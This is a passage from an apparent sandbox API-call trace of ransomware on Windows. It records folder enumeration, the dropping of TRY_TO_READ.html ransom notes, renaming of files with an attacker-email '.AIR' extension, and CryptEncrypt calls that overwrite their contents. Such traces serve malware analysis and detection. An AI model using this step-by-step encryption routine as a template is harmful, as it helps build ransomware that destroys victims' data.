nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0161.606] CreateFileW (lpFileName="C:\\\\Users\\Public\\Documents\\My Music\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\documents\\my music\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f0 [0161.608] FindNextFileW (in: hFindFile=0x35e718, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0161.608] CreateFileW (lpFileName="C:\\\\Users\\Public\\Documents\\My Pictures\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\documents\\my pictures\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f0 [0161.609] FindNextFileW (in: hFindFile=0x35e718, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0161.609] CreateFileW (lpFileName="C:\\\\Users\\Public\\Documents\\My Videos\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\documents\\my videos\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f0 [0161.610] FindNextFileW (in: hFindFile=0x35e718, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x978cec50, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x978cec50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9791af10, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0161.610] FindNextFileW (in: hFindFile=0x35e718, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x978cec50, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x978cec50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9791af10, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0161.610] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.610] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.610] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Documents\\desktop.ini", dwFileAttributes=0x80) returned 1 [0161.610] lstrlenW (lpString="C:\\\\Users\\Public\\Documents\\desktop.ini") returned 38 [0161.610] GetProcessHeap () returned 0x2e0000 [0161.611] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xb2) returned 0x34af58 [0161.611] lstrcpyW (in: lpString1=0x34af58, lpString2="C:\\\\Users\\Public\\Documents\\desktop.ini" | out: lpString1="C:\\\\Users\\Public\\Documents\\desktop.ini") returned="C:\\\\Users\\Public\\Documents\\desktop.ini" [0161.611] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Documents\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\Documents\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\Documents\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" [0161.611] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Documents\\desktop.ini" (normalized: "c:\\users\\public\\documents\\desktop.ini"), lpNewFileName="C:\\\\Users\\Public\\Documents\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\documents\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.614] CreateFileW (lpFileName="C:\\\\Users\\Public\\Documents\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\documents\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f0 [0161.614] GetProcessHeap () returned 0x2e0000 [0161.614] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34af58 | out: hHeap=0x2e0000) returned 1 [0161.614] GetFileSizeEx (in: hFile=0x4f0, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=278) returned 1 [0161.614] SetFilePointer (in: hFile=0x4f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x116 [0161.614] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.614] GetProcessHeap () returned 0x2e0000 [0161.614] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.614] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.614] WriteFile (in: hFile=0x4f0, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.615] WriteFile (in: hFile=0x4f0, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.615] WriteFile (in: hFile=0x4f0, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.615] ReadFile (in: hFile=0x4f0, lpBuffer=0x336dd8, nNumberOfBytesToRead=0x116, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x336dd8*, lpNumberOfBytesRead=0x2acf9c8*=0x116, lpOverlapped=0x0) returned 1 [0161.615] SetFilePointer (in: hFile=0x4f0, lDistanceToMove=-278, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.615] WriteFile (in: hFile=0x4f0, lpBuffer=0x31fae0*, nNumberOfBytesToWrite=0x116, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31fae0*, lpNumberOfBytesWritten=0x2acf9c8*=0x116, lpOverlapped=0x0) returned 1 [0161.615] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Downloads\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9791af10, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9791af10, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35e758 [0161.616] FindNextFileW (in: hFindFile=0x35e758, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9791af10, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9791af10, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.616] FindNextFileW (in: hFindFile=0x35e758, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28351f0f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0161.616] FindNextFileW (in: hFindFile=0x35e758, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9791af10, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x9791af10, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9791af10, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0161.616] FindNextFileW (in: hFindFile=0x35e758, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9791af10, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x9791af10, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9791af10, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0161.616] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.616] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.616] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Downloads\\desktop.ini", dwFileAttributes=0x80) returned 1 [0161.616] lstrlenW (lpString="C:\\\\Users\\Public\\Downloads\\desktop.ini") returned 38 [0161.616] GetProcessHeap () returned 0x2e0000 [0161.616] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xb2) returned 0x34af58 [0161.616] lstrcpyW (in: lpString1=0x34af58, lpString2="C:\\\\Users\\Public\\Downloads\\desktop.ini" | out: lpString1="C:\\\\Users\\Public\\Downloads\\desktop.ini") returned="C:\\\\Users\\Public\\Downloads\\desktop.ini" [0161.617] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Downloads\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\Downloads\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\Downloads\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" [0161.617] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Downloads\\desktop.ini" (normalized: "c:\\users\\public\\downloads\\desktop.ini"), lpNewFileName="C:\\\\Users\\Public\\Downloads\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\downloads\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.619] CreateFileW (lpFileName="C:\\\\Users\\Public\\Downloads\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\downloads\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f4 [0161.619] GetProcessHeap () returned 0x2e0000 [0161.619] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34af58 | out: hHeap=0x2e0000) returned 1 [0161.619] GetFileSizeEx (in: hFile=0x4f4, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=174) returned 1 [0161.619] SetFilePointer (in: hFile=0x4f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xae [0161.619] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.619] GetProcessHeap () returned 0x2e0000 [0161.619] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.619] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.619] WriteFile (in: hFile=0x4f4, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.621] WriteFile (in: hFile=0x4f4, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.621] WriteFile (in: hFile=0x4f4, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.621] ReadFile (in: hFile=0x4f4, lpBuffer=0x33b4a0, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33b4a0*, lpNumberOfBytesRead=0x2acf9c8*=0xae, lpOverlapped=0x0) returned 1 [0161.621] SetFilePointer (in: hFile=0x4f4, lDistanceToMove=-174, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.621] WriteFile (in: hFile=0x4f4, lpBuffer=0x33b3e8*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33b3e8*, lpNumberOfBytesWritten=0x2acf9c8*=0xae, lpOverlapped=0x0) returned 1 [0161.622] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Favorites\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x978cec50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978cec50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35e798 [0161.622] FindNextFileW (in: hFindFile=0x35e798, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x978cec50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978cec50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.622] FindNextFileW (in: hFindFile=0x35e798, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x978cec50, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x978cec50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9791af10, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0161.622] FindNextFileW (in: hFindFile=0x35e798, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x978cec50, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x978cec50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9791af10, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0161.622] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Libraries\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x97941070, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97941070, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35e7d8 [0161.622] FindNextFileW (in: hFindFile=0x35e7d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x97941070, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97941070, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.623] FindNextFileW (in: hFindFile=0x35e7d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2839e1d0, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2839e1d0, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288f9359, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x58, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0161.623] FindNextFileW (in: hFindFile=0x35e7d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2837806f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x289b7a3b, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x36c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecordedTV.library-ms", cAlternateFileName="RECORD~1.LIB")) returned 1 [0161.623] FindNextFileW (in: hFindFile=0x35e7d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9791af10, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x9791af10, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x979671d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0161.623] FindNextFileW (in: hFindFile=0x35e7d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9791af10, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x9791af10, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x979671d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0161.623] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.623] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.623] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Libraries\\RecordedTV.library-ms", dwFileAttributes=0x80) returned 1 [0161.623] lstrlenW (lpString="C:\\\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned 48 [0161.623] GetProcessHeap () returned 0x2e0000 [0161.623] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc6) returned 0x319d30 [0161.623] lstrcpyW (in: lpString1=0x319d30, lpString2="C:\\\\Users\\Public\\Libraries\\RecordedTV.library-ms" | out: lpString1="C:\\\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned="C:\\\\Users\\Public\\Libraries\\RecordedTV.library-ms" [0161.623] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Libraries\\RecordedTV.library-ms", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\Libraries\\RecordedTV.library-ms.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\Libraries\\RecordedTV.library-ms.12781717671972518758.ex_parvis@aol.com.AIR" [0161.623] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms"), lpNewFileName="C:\\\\Users\\Public\\Libraries\\RecordedTV.library-ms.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.625] CreateFileW (lpFileName="C:\\\\Users\\Public\\Libraries\\RecordedTV.library-ms.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4fc [0161.625] GetProcessHeap () returned 0x2e0000 [0161.625] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0161.625] GetFileSizeEx (in: hFile=0x4fc, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=876) returned 1 [0161.625] SetFilePointer (in: hFile=0x4fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x36c [0161.625] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.625] GetProcessHeap () returned 0x2e0000 [0161.626] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.626] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.626] WriteFile (in: hFile=0x4fc, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.627] WriteFile (in: hFile=0x4fc, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.627] WriteFile (in: hFile=0x4fc, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.627] ReadFile (in: hFile=0x4fc, lpBuffer=0x31d01e0, nNumberOfBytesToRead=0x36c, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d01e0*, lpNumberOfBytesRead=0x2acf9c8*=0x36c, lpOverlapped=0x0) returned 1 [0161.627] SetFilePointer (in: hFile=0x4fc, lDistanceToMove=-876, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.627] WriteFile (in: hFile=0x4fc, lpBuffer=0x31d0558*, nNumberOfBytesToWrite=0x36c, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d0558*, lpNumberOfBytesWritten=0x2acf9c8*=0x36c, lpOverlapped=0x0) returned 1 [0161.628] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.628] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.628] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Libraries\\desktop.ini", dwFileAttributes=0x80) returned 1 [0161.628] lstrlenW (lpString="C:\\\\Users\\Public\\Libraries\\desktop.ini") returned 38 [0161.628] GetProcessHeap () returned 0x2e0000 [0161.628] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xb2) returned 0x34af58 [0161.628] lstrcpyW (in: lpString1=0x34af58, lpString2="C:\\\\Users\\Public\\Libraries\\desktop.ini" | out: lpString1="C:\\\\Users\\Public\\Libraries\\desktop.ini") returned="C:\\\\Users\\Public\\Libraries\\desktop.ini" [0161.628] 